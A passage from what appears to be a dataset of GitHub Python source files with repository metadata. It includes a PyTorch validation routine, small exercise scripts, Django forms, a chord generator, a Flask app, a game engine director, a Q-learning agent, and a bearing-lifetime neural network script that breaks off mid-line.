DataLoader, model, loud=False, print_classification_report=False, return_predictions=False,\n return_probabilities=False):\n \"\"\"\n Makes validation of the model using validation dataset.\n\n Parameters:\n - val_loader - DataLoader with validation dataset which consists labels\n - model - model which is going to be validated\n - loud - if set to True prints the score for the model\n - print_classification_report - if set to true prints classification report\n - return_predictions - if set to true returns precision_recall_auc, outputs, targets (float, list, list)\n else returns precision_recall_auc\n - return_probabilities - if return predictions == True and return_probabilities == True,\n list of outputs and targets consists of class probabilities instead of class labels\n\n Returns:\n - precision recall auc for the model or precision recall auc for the model + lists of outputs and targets\n \"\"\"\n\n outputs, outputs_probabilities, targets = [], [], []\n\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n for i, (features, target) in enumerate(val_loader):\n\n features = features.to(device)\n target = target.to(device)\n\n # compute output\n output, _ = model(features)\n\n # appending values for classification report\n outputs_probabilities = outputs_probabilities + list(output[:, 1].cpu().detach().numpy())\n _, output = torch.max(output.data, 1)\n outputs = outputs + list(output.cpu().detach().numpy())\n targets = targets + list(target.cpu().detach().numpy())\n\n precision_recall_auc = average_precision_score(targets, outputs_probabilities)\n\n if loud:\n print(f'Precision-Recall Score: {precision_recall_auc}')\n if print_classification_report:\n print(f'Classification Report: \\n{classification_report(targets, outputs)}')\n print(f'Confusion Matrix: \\n{np.round(confusion_matrix(targets, outputs), 2)}')\n print(f'Precision-Recall Score: \\n{precision_recall_auc}')\n\n if return_predictions:\n if not return_probabilities:\n return precision_recall_auc, outputs, targets\n else:\n return precision_recall_auc, outputs_probabilities, targets\n else:\n return precision_recall_auc\n","repo_name":"DawidSitnik/Application-of-Domain-Adaptation-Techniques-for-Classifying-Particles-Basing-On-the-Data-From-ALICE","sub_path":"utils/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11595259037","text":"from cmath import pi\nimport math\n\nprint(\"Funcion que calcula el area de un triangulo\")\n\nbase_triangulo = float(input(\"Escribe la base del triangulo: \"))\naltura_triangulo = float(input(\"Escribe la altura del triangulo: \"))\nradio_circulo = float(input(\"Escribe el radio del circulo: \"))\n\n\ndef area_triangulo(a, b):\n area = float((a*b)/2)\n print(area)\n\ndef area_circulo(radio):\n pi = math.pi\n area = float(pi * (radio * radio))\n print(\"El radio del circulo es: \", area) \n\narea_triangulo(base_triangulo, altura_triangulo)\narea_circulo(radio_circulo)","repo_name":"vicbassdeveloper/EjerciciosOpenBootCamp","sub_path":"cursopython/Tema5/Ejercicio1.py","file_name":"Ejercicio1.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26899064552","text":"from dataclasses import field\nfrom pyexpat import model\nfrom django import forms\nfrom .models import Profile\n\n\n\n\n\n\n\n\nclass UpdateProfileForm(forms.ModelForm):\n # avatar = forms.ImageField(widget=forms.FileInput(attrs={'class': 'form-control-file'}))\n # bio = forms.CharField(widget=forms.Textarea(attrs={'class': 'form-control', 'rows': 5}))\n\n class Meta:\n model = Profile\n fields = '__all__'\n exclude = ['user']\nLANGUAGE_CHOICES=(\n ('JAVA','Java'),\n ('JAVASCRIPT','Javascript'),\n ('PYTHON','Python'),\n ('.NET','.Net'),\n )\nclass LanguageForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields= ['language']\n #field = forms.ChoiceField(choices=LANGUAGE_CHOICES, widget=forms.Select(attrs={'onchange': 'submit();'}))\n \n # class Meta:\n # model = Profile\n # fields = ['language']\n","repo_name":"iliyas01/test-repo","sub_path":"hitalent/Hitalent/UI/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12209913281","text":"print(\"Importing packages...\")\nfrom synthesizer import Player, Synthesizer, Waveform\n\nfrom chords.symbol.getComponents import ChordParts\nfrom chords.ngrams.ngrams import NGrams\nfrom chords.chord import Chord\nfrom dataset.readData import rootAndDegrees as readData\nfrom chords.symbol.parts.noteSymbol import Note\nfrom chords.symbol.getComponents import ChordParts\n\nplayer = Player()\nplayer.open_stream()\nsynthesizer = Synthesizer(osc1_waveform=Waveform.triangle, osc1_volume=1, use_osc2=False)\n\n\ndef getKey():\n return Note(input()).toNumber()\n\ndef getChordSequence():\n chords = []\n for chordString in input().split():\n chords += [ChordParts(chordString, key).chord]\n return chords\n\ndef generateNextChord(key, chords, exclude = []):\n ngrams = NGrams(readData())\n\n chordsForNgram = list(map(lambda x: x.getJson(), chords))\n\n print(\"\\nBuilding Ngrams with n = \", len(chordsForNgram) + 1, \"...\")\n ngrams.build(len(chordsForNgram) + 1)\n\n while (len(ngrams.getProbs(chordsForNgram)) == 0):\n chordsForNgram = chordsForNgram[1:]\n print(\"No Ngrams, building with n = \", len(chordsForNgram) + 1, \"...\")\n ngrams.build(len(chordsForNgram) + 1)\n\n probs = ngrams.getProbs(chordsForNgram)[:5]\n print(\"\\nMost likely chords:\")\n for prob in probs:\n chordName = Chord(prob[0]['root'], prob[0]['components']).toSymbol(key=key)\n print(f\"{chordName} - {round(prob[1] * 100)}%\")\n print()\n\n nextChordJson, chance = ngrams.getNext(chordsForNgram, exclude)\n\n nextChord = Chord(nextChordJson['root'], nextChordJson['components'])\n\n print(\"Current chord sequence: \", end=\"\")\n for chord in chords:\n print(chord.toSymbol(key=key), end=\" \")\n print()\n print(f\"Next chord: {nextChord.toSymbol(key=key)} - {round(chance * 100)}%\")\n\n def getNextChord():\n playChords(chords + [nextChord])\n print(\"[N]ew chord - [A]dd to sequence - [P]lay again\")\n\n answer = input()\n if (answer == \"A\" or answer == \"a\"):\n return nextChord\n elif (answer == \"P\" or answer == \"p\"):\n return getNextChord()\n else:\n return generateNextChord(key, chords, exclude + [nextChord])\n \n return getNextChord()\n\ndef playChords(chords):\n for chord in chords:\n print(\"Playing\", chord.toSymbol(key=key))\n player.play_wave(synthesizer.generate_chord(chord.getNotes(key=key), 1.0))\n\n\nprint(\"\\nEnter key:\")\nkey = getKey()\nprint(\"\\nEnter chord sequence:\")\nchordSequence = getChordSequence()\nwhile True:\n nextChord = generateNextChord(key, chordSequence)\n chordSequence += [nextChord]\n","repo_name":"felixxwu/Jazz-Chord-Generator","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70763548888","text":"from app import app\nfrom flask import jsonify\nfrom datetime import datetime\nfrom app.models.base import mysql_db\n\n@app.route('/', methods=['GET'])\ndef index():\n utc = datetime.utcnow()\n serverTime = datetime.now()\n message = {\n 'status': 'OK',\n 'utc_time': utc,\n 'time': serverTime\n }\n return jsonify(message)\n\n@app.before_request\ndef before_request():\n mysql_db.connect()\n\n@app.after_request\ndef after_request(response):\n mysql_db.close()\n return response\n\n@app.errorhandler(404)\ndef not_found(error=None):\n message = {\n 'code': 404,\n 'message': 'Not Found: ',\n }\n res = jsonify(message)\n res.status_code = 404\n\n return res\n","repo_name":"madejean/airbnb","sub_path":"api/app/views/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14892991911","text":"import random\r\nimport os\r\nfrom time import sleep\r\n\r\n\r\ndef clear():\r\n os.system('cls' if os.name == 'nt' else 'clear')\r\n\r\n\r\ndef welcome():\r\n print(\"\\nWelcome to Memory Game!!\")\r\n print(\"Here i am going to show you a few numbers for 0.7 seconds and you are gonna need to memories them!!\")\r\n\r\n\r\ndef generate_sequence(difficulty):\r\n global random_number\r\n global list_from_random\r\n for number in range(0, int(difficulty)):\r\n random_number = str(random.randint(1, 101))\r\n print(random_number)\r\n list_from_random = list(random_number)\r\n sleep(0.7)\r\n\r\n\r\ndef get_list_from_user():\r\n global the_list\r\n global guess_number\r\n print(\"Please enter the numbers you remember: \")\r\n guess_number = input()\r\n list_of_user = list(guess_number)\r\n if list_of_user == list_from_random:\r\n print(\"You won!!\")\r\n else:\r\n print(list_of_user, list_from_random)\r\n\r\n\r\ndef play(difficulty):\r\n clear()\r\n welcome()\r\n generate_sequence(difficulty)\r\n clear()\r\n print(\"Your time ended!!\")\r\n get_list_from_user()\r\n","repo_name":"simcah-qb/world_of_games","sub_path":"MemoryGame.py","file_name":"MemoryGame.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19178441671","text":"\"\"\"Director\r\n\r\nThis module define the Director singleton object that \r\n\"\"\"\r\n\r\n__all__ = [\r\n \"Director\",\r\n ]\r\n\r\nimport time\r\n\r\n\r\nfrom Opioid2D.internal.utils import deprecated\r\nfrom Opioid2D.internal.objectmgr import ObjectManager\r\nfrom Opioid2D.public.Image import ImageMeta\r\nfrom Opioid2D.public.ResourceManager import ResourceManager\r\nimport sys, traceback\r\n\r\nclass Director(object):\r\n \"\"\"Director\r\n\r\n The Director singleton is the main controller of the software\r\n runtime. It handles transitions from one scene to another, updates\r\n the screen and calls event and collision handlers.\r\n \"\"\"\r\n _cDirector = None\r\n \r\n @deprecated\r\n def Run(self, initialScene, *args, **kw):\r\n return self.run(initialScene, *args, **kw)\r\n \r\n def run(self, initialScene, *args, **kw):\r\n \"\"\"Run the Director mainloop until program exit\r\n \"\"\"\r\n try:\r\n # This is a long and ugly function that hasn't been splitted into smaller parts\r\n # because of performance considerations.\r\n #\r\n \r\n import pygame\r\n pygame.init()\r\n from Opioid2D.public.Mouse import Mouse\r\n \r\n # Bind functions to local names in order to increase performance\r\n sleep = time.sleep\r\n throttle = pygame.time.Clock()\r\n flip = pygame.display.flip\r\n get_ticks = pygame.time.get_ticks\r\n cD = self._cDirector\r\n OM = ObjectManager\r\n \r\n self._scene = None\r\n self.next_scene = None\r\n self.next_state = None\r\n \r\n now = get_ticks()\r\n cD.Start(now)\r\n\r\n self.set_scene(initialScene, *args, **kw)\r\n \r\n self._running = True \r\n start = time.time()\r\n frames = 0\r\n self.delta = 0\r\n ticker = cD.GetTicker()\r\n old_ticks = now\r\n self.now = now\r\n \r\n # Preload Image subclasses that have been imported and that\r\n # contain the preload flag.\r\n for img in ImageMeta.subclasses:\r\n if img.preload:\r\n ResourceManager.get_image(img)\r\n \r\n while self._running:\r\n # Trigger possible scene change at the beginning of a new frame\r\n if self.next_scene is not None:\r\n self._change_scene()\r\n \r\n # Time delta calculation\r\n ticks = get_ticks()\r\n self.delta = delta = min(ticks-old_ticks, 25) # limit the virtual clock to a max. advance of 25ms per frame\r\n old_ticks = ticks\r\n self.now = now = now + delta\r\n cD.Iterate(now)\r\n \r\n scene = self._scene\r\n cscene = scene._cObj\r\n cscene.Tick()\r\n \r\n # Event handling\r\n ev = pygame.event.get()\r\n if scene._gui is not None:\r\n scene._gui.tick(ev)\r\n scene._handle_events(ev)\r\n \r\n # Call Scene tick callbacks\r\n if scene._tickfunc is not None:\r\n scene._tickfunc()\r\n if ticker.realTick:\r\n if scene._realtickfunc is not None:\r\n scene._realtickfunc()\r\n \r\n # Manage state change within the scene\r\n while self.next_state is not None:\r\n s = self.next_state\r\n self.next_state = None\r\n self.scene._init_state(s)\r\n \r\n # Update the screen\r\n cD.RenderFrame()\r\n \r\n # render software mouse cursor\r\n ms = Mouse._sprite\r\n if ms:\r\n ms.position = Mouse.position\r\n ms._cObj.TraverseFree()\r\n \r\n flip()\r\n \r\n # Purge managed C++ objects that have been killed on the C++ side.\r\n OM.purge()\r\n \r\n frames += 1\r\n throttle.tick(100) # limit FPS to 100 for lower CPU usage\r\n end = time.time()\r\n finally:\r\n from Opioid2D import _opi2d\r\n _opi2d.cleanup()\r\n return frames/(end-start)\r\n\r\n @deprecated\r\n def SetScene(self, sceneClass, *args, **kw):\r\n self.set_scene(sceneClass, *args, **kw)\r\n @deprecated\r\n def GetScene(self):\r\n return self.get_scene()\r\n\r\n def set_scene(self, sceneClass, *args, **kw):\r\n \"\"\"Change to a new Scene\"\"\"\r\n self.next_scene = sceneClass, args, kw\r\n def get_scene(self):\r\n \"\"\"Get the currently active Scene\"\"\"\r\n return self._scene\r\n scene = property(get_scene, set_scene)\r\n\r\n @deprecated\r\n def GetTime(self):\r\n return self.get_time()\r\n\r\n def get_time(self):\r\n return self._cDirector.GetTicker().now\r\n time = property(get_time)\r\n\r\n @deprecated\r\n def GetDelta(self):\r\n return self.get_delta()\r\n \r\n def get_delta(self):\r\n return self.delta\r\n\r\n @deprecated\r\n def Quit(self):\r\n self.quit()\r\n \r\n def quit(self):\r\n \"\"\"Exit the Director mainloop.\r\n\r\n You only need to call this if you have called Director.Run()\r\n and want to stop executing it.\r\n \"\"\"\r\n self._running = False\r\n\r\n def _change_scene(self):\r\n sceneClass, args, kw = self.next_scene\r\n self.next_scene = None\r\n if self._scene is not None:\r\n self._scene.exit()\r\n self._scene = sceneClass()\r\n self._cDirector.SetScene(self.scene._cObj)\r\n self._scene.enter(*args, **kw)\r\n \r\n \r\nDirector = Director()\r\n","repo_name":"sunsp1der/opioid2d","sub_path":"pyimpl/Opioid2D/public/Director.py","file_name":"Director.py","file_ext":"py","file_size_in_byte":5896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72177384728","text":"from agent.agent import *\nimport numpy as np\nimport jax\nimport jax.numpy as jnp\nfrom functools import partial\nfrom utils.sampling import sample_batch_index\n\nclass QAgent(OnlineAgent):\n def __init__(self,*args,temp=1.,alpha_q=0.1,informed=False,scaled_beta=False,**kwargs):\n super().__init__(*args,**kwargs)\n self.reset()\n\n self.temp = temp\n self.alpha_q = alpha_q\n self.informed = informed\n self.scaled_beta = scaled_beta\n\n self.memory_reward = []\n self.memory_action = []\n\n def reset(self):\n self.q_values = np.zeros(self.env.n_symbols)\n \n #@partial(jax.jit,static_argnums=0)\n def forward(self,obs):\n q_val = self.q_values[np.array(obs)]\n temp = self.temp\n if self.scaled_beta == 'cheat':\n temp *= self.env.get_current_range()\n elif self.scaled_beta == 'memory':\n if max(self.q_values) != min(self.q_values):\n temp *= max(self.q_values)-min(self.q_values)\n q_val_temp = q_val/temp\n action_probs = jax.nn.softmax(q_val_temp,axis=1)\n self.log('ActionProbs',action_probs[0])\n actions = sample_batch_index(next(self.rng),action_probs)\n logprobs = jnp.log(action_probs[np.arange(action_probs.shape[0]),np.array(actions)])\n return actions,logprobs\n\n def learn(self,ts):\n (o,a,lp,r,no,d,i) = ts\n chosen_symbol = o[0,a[0]]\n o = o[0]\n\n #Update Q\n self.q_values[chosen_symbol] += self.alpha_q * (r - self.q_values[chosen_symbol])#/np.exp(lp)\n\n def init_new_season(self):\n self.memory_reward.append([])\n self.memory_action.append([])\n\n def train(self,nb_steps):\n o = self.env.reset()\n self.init_new_season()\n for i in range(nb_steps):\n a,lp = self.forward(o)\n no,r,d,_ = self.env.step(a)\n ts = Timestep(o,a,lp,r,no,d,i)\n\n self.memory_reward[-1].append(r)\n self.memory_action[-1].append(a)\n\n self.log('Observation',o[0])\n self.log('Action',a[0])\n self.log('Reward',r[0])\n self.log('Done',d[0])\n self.log('NewObservation',no[0])\n self.log('EnvMini',self.env.min_range[self.env.current_season])\n self.log('EnvMaxi',self.env.max_range[self.env.current_season])\n self.log('EV',self.env.get_ev())\n self.log('QVal',self.q_values)\n\n self.learn(ts)\n if np.any(d):\n if len(self.env.min_range) == self.env.current_season+1:\n return\n self.env.next_season()\n if self.informed == 'cheat':\n self.q_values *= 0\n self.q_values += self.env.get_ev()\n elif self.informed == 'memory':\n unique_actions = np.unique(self.memory_action[-1])\n print(unique_actions)\n self.q_values[:] = self.q_values[unique_actions].mean()\n \n self.init_new_season()\n o = no\n else:\n o = no\n","repo_name":"Daetheys/EcologicalRange","sub_path":"agent/q_agent.py","file_name":"q_agent.py","file_ext":"py","file_size_in_byte":3124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31241650002","text":"import matplotlib.pyplot as plt\r\nimport os\r\nimport csv\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n\r\n#-------------------------------------------Data Preprocessing----------------------------------------------\r\n\r\ndef getTime(h, m, s, ms):\r\n return h * 3600 + m * 60 + s + ms * (10 ** -6)\r\n\r\ndef load_data(learning, condition, bearing, filelength, shrinkBy = 100):\r\n subfolder = 'Full_Test_Set'\r\n if(learning):\r\n subfolder = 'Learning_set'\r\n # These are used for input calculations ------\r\n time = []\r\n v_acc = []\r\n life_time = 0\r\n # These are temporary\r\n t = []\r\n v = []\r\n found = 0\r\n first = 1\r\n start = 0.0\r\n for i in range(1,filelength):\r\n num = str(i)\r\n zero_filled = num.zfill(5)\r\n with open(os.path.join('ieee-phm-2012-data-challenge-dataset-master',subfolder,'Bearing'+str(condition)+'_'+str(bearing),'acc_' + zero_filled + '.csv')) as csvfile:\r\n plots = csv.reader(csvfile, delimiter=',')\r\n for row in plots:\r\n if(first):\r\n start = getTime(float(row[0]), float(row[1]), float(row[2]), float(row[3]))\r\n t.append(0)\r\n v.append(float(row[5]))\r\n first = 0\r\n else:\r\n t.append(round(getTime(float(row[0]), float(row[1]), float(row[2]), float(row[3])) - start, 6))\r\n v.append(float(row[5]))\r\n if(abs(float(row[5])) > 20):\r\n life_time = round(getTime(float(row[0]), float(row[1]), float(row[2]), float(row[3])) - start, 6)\r\n found = 1\r\n break\r\n if(found):\r\n break\r\n #print('Loaded Dataset')\r\n # Shrinking the data from t and v to time and v_acc\r\n itr = int(len(t) / shrinkBy)\r\n remainingEle = len(t) % shrinkBy \r\n # print(\"Remaining elements: \",remainingEle)\r\n for i in range(itr):\r\n startIndex = i * shrinkBy\r\n endIndex = startIndex + shrinkBy\r\n time.append(np.mean(t[startIndex:endIndex]))\r\n maxEle = 0\r\n for j in range(startIndex, endIndex):\r\n if(abs(v[i]) > abs(maxEle)):\r\n maxEle = v[i]\r\n v_acc.append(maxEle)\r\n # For remaining elements if any\r\n if (remainingEle > 0):\r\n time.append(np.mean(t[itr * shrinkBy : ]))\r\n maxEle = 0\r\n for j in range(itr * shrinkBy, len(v)):\r\n if(abs(v[j]) > abs(maxEle)):\r\n maxEle = v[j]\r\n v_acc.append(maxEle)\r\n #print('Shrunk by',shrinkBy)\r\n if(life_time == 0):\r\n life_time = time[-1]\r\n return time, v_acc, life_time\r\n\r\ndef preprocess_dataset(time, v_acc, window_size=100):\r\n # rolling rms -------------------\r\n rolling_rms = pd.Series(v_acc).pow(2).rolling(window_size).apply(lambda x: np.sqrt(x.mean()))\r\n rolling_rms = rolling_rms.dropna() \r\n #print(\"Calculated Rolling RMS\")\r\n \r\n # rolling kurtosis -------------------\r\n rolling_kurt = pd.Series(v_acc)\r\n rolling_kurt = rolling_kurt.rolling(window_size).kurt()\r\n rolling_kurt = rolling_kurt.dropna()\r\n #print(\"Calculated Rolling Kurtosis\")\r\n \r\n # rolling time ------------------\r\n rolling_time = pd.Series(time)\r\n rolling_time = rolling_time.rolling(window_size).mean()\r\n rolling_time = rolling_time.dropna()\r\n #print(\"Calculated Rolling Time\")\r\n \r\n # Weibull constants -------------------\r\n # for RMS\r\n etaRMS = 1.2017\r\n gammaRMS = 0.4077\r\n etaByGammaRMS = etaRMS / gammaRMS\r\n # for Kurtosis\r\n etaKurt = 1.2970\r\n gammaKurt = 0.4360\r\n etaByGammaKurt = etaKurt / gammaKurt\r\n \r\n # Weibull Hazard for RMS ------------------\r\n weibull_hazardRMS = []\r\n for i in rolling_rms:\r\n if(i > 0):\r\n weibull_hazardRMS.append(round(etaByGammaRMS * ((i / gammaRMS) ** (etaRMS - 1)), 6))\r\n else: \r\n weibull_hazardRMS.append(0)\r\n #print(\"Calculated Weibull RMS\")\r\n \r\n # Weibull Hazard for Kurtosis -------------------\r\n weibull_hazardKurt = []\r\n for i in rolling_kurt:\r\n if(i > 0):\r\n weibull_hazardKurt.append(round(etaByGammaKurt * ((i / gammaKurt) ** (etaKurt - 1)), 6))\r\n else:\r\n weibull_hazardKurt.append(0)\r\n #print(\"Calculated Weibull Kurtosis\")\r\n return rolling_time.tolist(), weibull_hazardRMS, weibull_hazardKurt\r\n\r\ndef split_x_y(life_time, time, weibull_RMS, weibull_Kurt):\r\n x_train = np.empty((1,6), float)\r\n y_train = np.array([round(i/life_time,6) for i in time])\r\n x = np.array([time, weibull_RMS, weibull_Kurt]).transpose()\r\n for i in range(1,x.shape[0]):\r\n x_train = np.append(x_train, np.reshape(np.hstack((x[i-1],x[i])), (-1, 6)), axis=0)\r\n \r\n x_train = x_train[1:]\r\n y_train = y_train[1:]\r\n return x_train, y_train\r\n\r\n#---------------------------------------Neural Net----------------------------------------\r\n\r\nclass NeuralNet():\r\n #A two layer neural network\r\n\r\n def __init__(self, layers=[6, 2, 1], learning_rate=0.001, iterations=100, batch_size = 1000):\r\n self.params = {}\r\n self.learning_rate = learning_rate\r\n self.iterations = iterations\r\n self.loss = []\r\n self.sample_size = None\r\n self.layers = layers\r\n self.X = None\r\n self.y = None\r\n self.batch_size = batch_size\r\n\r\n def init_weights(self):\r\n #np.random.seed(1) # Seed the random number generator\r\n self.params[\"W1\"] = np.random.randn(self.layers[0], self.layers[1])\r\n self.params['b1'] = np.random.randn(self.layers[1], )\r\n self.params['W2'] = np.random.randn(self.layers[1], self.layers[2])\r\n self.params['b2'] = np.random.randn(self.layers[2], )\r\n\r\n def relu(self, Z):\r\n return np.maximum(0, Z)\r\n\r\n def dRelu(self, x):\r\n x[x <= 0] = 0\r\n x[x > 0] = 1\r\n return x\r\n\r\n def eta(self, x):\r\n ETA = 0.0000000001\r\n return np.maximum(x, ETA)\r\n\r\n def sigmoid(self, Z):\r\n return 1 / (1 + np.exp(-Z))\r\n\r\n def entropy_loss(self, y, yhat):\r\n nsample = len(y)\r\n yhat_inv = 1.0 - yhat\r\n y_inv = 1.0 - y\r\n yhat = self.eta(yhat)\r\n yhat_inv = self.eta(yhat_inv)\r\n loss = -1 / nsample * (np.sum(np.multiply(np.log(yhat), y) + np.multiply((y_inv), np.log(yhat_inv))))\r\n return loss\r\n\r\n def forward_propagation(self, x_, i):\r\n \r\n Z1 = x_.dot(self.params['W1']) + self.params['b1']\r\n A1 = self.sigmoid(Z1)\r\n Z2 = A1.dot(self.params['W2']) + self.params['b2']\r\n yhat = self.relu(Z2)\r\n #loss = self.entropy_loss(self.y, yhat)\r\n# print(\"\\nx: \",x_[:5,:])\r\n# print(\"\\nZ1: \",Z1[:5,:])\r\n# print(\"\\nA1: \",A1[:5,:])\r\n# print(\"\\nZ2: \",Z2[:2,:])\r\n# print(\"\\nyhat: \",yhat[:2,:])\r\n\r\n self.params['Z1'+str(i)] = Z1\r\n self.params['Z2'+str(i)] = Z2\r\n self.params['A1'+str(i)] = A1\r\n\r\n return yhat.reshape(yhat.shape[0])\r\n\r\n def back_propagation(self, x_, y_, yhat, i):\r\n # y_inv = 1 - y_\r\n # yhat_inv = 1 - yhat\r\n # np.divide(y_inv, self.eta(yhat_inv)) - np.divide(y_, self.eta(yhat))\r\n# print(\"\\ni \",i)\r\n# print(\"\\nx \",x_[:5,:])\r\n# print(\"\\nyhat: \",yhat[:5])\r\n dl_wrt_yhat = yhat - y_\r\n dl_wrt_z2 = dl_wrt_yhat * self.dRelu(self.params['Z2'+str(i)].flatten())\r\n dl_wrt_z2 = dl_wrt_z2.reshape(dl_wrt_z2.shape[0],1)\r\n# print(\"dl_wrt_yhat_shape: \",dl_wrt_yhat.shape)\r\n# print(\"dl_wrt_z2_shape: \",dl_wrt_z2.shape)\r\n \r\n# print(\"\\ndl_wrt_yhat: \",dl_wrt_yhat[:2])\r\n# print(\"\\nz2: \",self.params['Z2'+str(i)])\r\n# print(\"\\ndl_wrt_z2: \",dl_wrt_z2[:2])\r\n\r\n dl_wrt_A1 = dl_wrt_z2.dot(self.params['W2'].T)\r\n dl_wrt_w2 = self.params['A1'+str(i)].T.dot(dl_wrt_z2)\r\n dl_wrt_b2 = np.sum(dl_wrt_z2, axis=0, keepdims=True)\r\n\r\n# print(\"\\ndl_wrt_A1: \",dl_wrt_A1[:2])\r\n# print(\"\\ndl_wrt_w2: \",dl_wrt_w2[:2])\r\n# print(\"\\ndl_wrt_b2: \",dl_wrt_b2[:2])\r\n\r\n dl_wrt_z1 = dl_wrt_A1 * self.params['A1'+str(i)] * (np.ones(self.params['A1'+str(i)].shape) - self.params['A1'+str(i)])\r\n dl_wrt_w1 = x_.T.dot(dl_wrt_z1)\r\n dl_wrt_b1 = np.sum(dl_wrt_z1, axis=0, keepdims=True)\r\n \r\n# print(\"\\ndl_wrt_z1: \",dl_wrt_z1[:2])\r\n# print(\"\\ndl_wrt_w1: \",dl_wrt_w1[:2])\r\n# print(\"\\ndl_wrt_b1: \",dl_wrt_b1[:2])\r\n\r\n self.params['W1'] = self.params['W1'] - self.learning_rate * dl_wrt_w1\r\n self.params['W2'] = self.params['W2'] - self.learning_rate * dl_wrt_w2\r\n self.params['b1'] = self.params['b1'] - self.learning_rate * dl_wrt_b1\r\n self.params['b2'] = self.params['b2'] - self.learning_rate * dl_wrt_b2\r\n\r\n\r\n def fit(self, X, y):\r\n self.X = X\r\n self.y = y\r\n # initialize weights and bias\r\n self.init_weights() \r\n \r\n batches = [(X[i:i + self.batch_size,:], y[i:i + self.batch_size]) for i in range(0, X.shape[0], self.batch_size)]\r\n #print(\"batches_shape: \",len(batches))\r\n\r\n for i in range(self.iterations):\r\n for i in range(len(batches)):\r\n x_, y_ = batches[i]\r\n #print(\"x_shape: \",x_.shape)\r\n #print(\"y_shape: \",y_.shape)\r\n yhat = self.forward_propagation(x_, i)\r\n #print(\"yhat_shape: \",yhat.shape)\r\n self.back_propagation(x_, y_, yhat, i)\r\n\r\n def predict(self, X):\r\n Z1 = X.dot(self.params['W1']) + self.params['b1']\r\n A1 = self.relu(Z1)\r\n Z2 = A1.dot(self.params['W2']) + self.params['b2']\r\n pred = self.sigmoid(Z2)\r\n return np.round(pred)\r\n\r\n def acc(self, y, yhat):\r\n acc = int(sum(y == yhat) / len(y) * 100)\r\n return acc\r\n\r\n def plot_loss(self):\r\n plt.plot(self.loss)\r\n plt.xlabel(\"Iteration\")\r\n plt.ylabel(\"logloss\")\r\n plt.title(\"Loss curve for training\")\r\n plt.show()\r\n\r\n# nn1 = NeuralNet(layers=[6, 2, 1], learning_rate=0.01, iterations=100)\r\n# nn1.fit(X_train1_1, Y_train1_1)\r\n# print('C1B1: Model Trained')\r\n#nn1.fit(X_train1_2, Y_train1_2)\r\n#print('C1B2: Model Trained')\r\n#\r\n#Y_pred1_3 = nn1.predict(X_test1_3)\r\n#mean_percent_error = np.mean((abs(Y_pred1_3.flatten() - Y_test1_3) / Y_test1_3) * 100)\r\n#predicted_RUL = (1-Y_pred1_3[-1])[0]*life_time1_3\r\n#print('\\nB13 Predicted RUL: ',predicted_RUL,'s')\r\n#print('B13 Actual RUL: ',test_RUL1_3,'s')\r\n#print('Test B13 Mean Error: ',mean_percent_error,'%')\r\n#---------------------------------------Test RULs-------------------------------------------------------\r\n\r\ntest_RUL1_3 = 5730\r\ntest_RUL1_5 = 1610\r\ntest_RUL1_6 = 1460\r\ntest_RUL1_7 = 7570\r\ntest_RUL2_3 = 7530\r\ntest_RUL2_4 = 1390\r\ntest_RUL2_5 = 3090\r\ntest_RUL2_6 = 1290\r\ntest_RUL2_7 = 580\r\ntest_RUL3_3 = 820\r\n\r\n#---------------------------------------Loading and Preprocessing---------------------------------------\r\n \r\nprint('\\nCondition 1: \\n')\r\n\r\ntime, v_acc, life_time = load_data(learning=True, condition=1, bearing=1, filelength=2803)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nX_train1_1, Y_train1_1 = split_x_y(life_time, time, weibull_RMS, weibull_Kurt)\r\nprint('C1B1: Train Dataset Loaded')\r\n\r\ntime, v_acc, life_time = load_data(learning=True, condition=1, bearing=2, filelength=871)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nX_train1_2, Y_train1_2 = split_x_y(life_time, time, weibull_RMS, weibull_Kurt)\r\nprint('C1B2: Train Dataset Loaded')\r\n\r\ntime, v_acc, life_time1_3 = load_data(learning=False, condition=1, bearing=3, filelength=2375)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time1_3 += test_RUL1_3\r\nX_test1_3, Y_test1_3 = split_x_y(life_time1_3, time, weibull_RMS, weibull_Kurt)\r\nprint('C1B3: Test Dataset Loaded')\r\n\r\n#time, v_acc, life_time = load_data(learning=False, condition=1, bearing=4, filelength=1428)\r\n#time, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc, life_time) \r\n#X_test1_4, Y_test1_4 = split_x_y(life_time, time, weibull_RMS, weibull_Kurt)\r\n#print('C1B4: Test Dataset Loaded')\r\n\r\ntime, v_acc, life_time1_5 = load_data(learning=False, condition=1, bearing=5, filelength=2463)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time1_5 += test_RUL1_5\r\nX_test1_5, Y_test1_5 = split_x_y(life_time1_5, time, weibull_RMS, weibull_Kurt)\r\nprint('C1B5: Test Dataset Loaded')\r\n\r\ntime, v_acc, life_time1_6 = load_data(learning=False, condition=1, bearing=6, filelength=2448)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time1_6 += 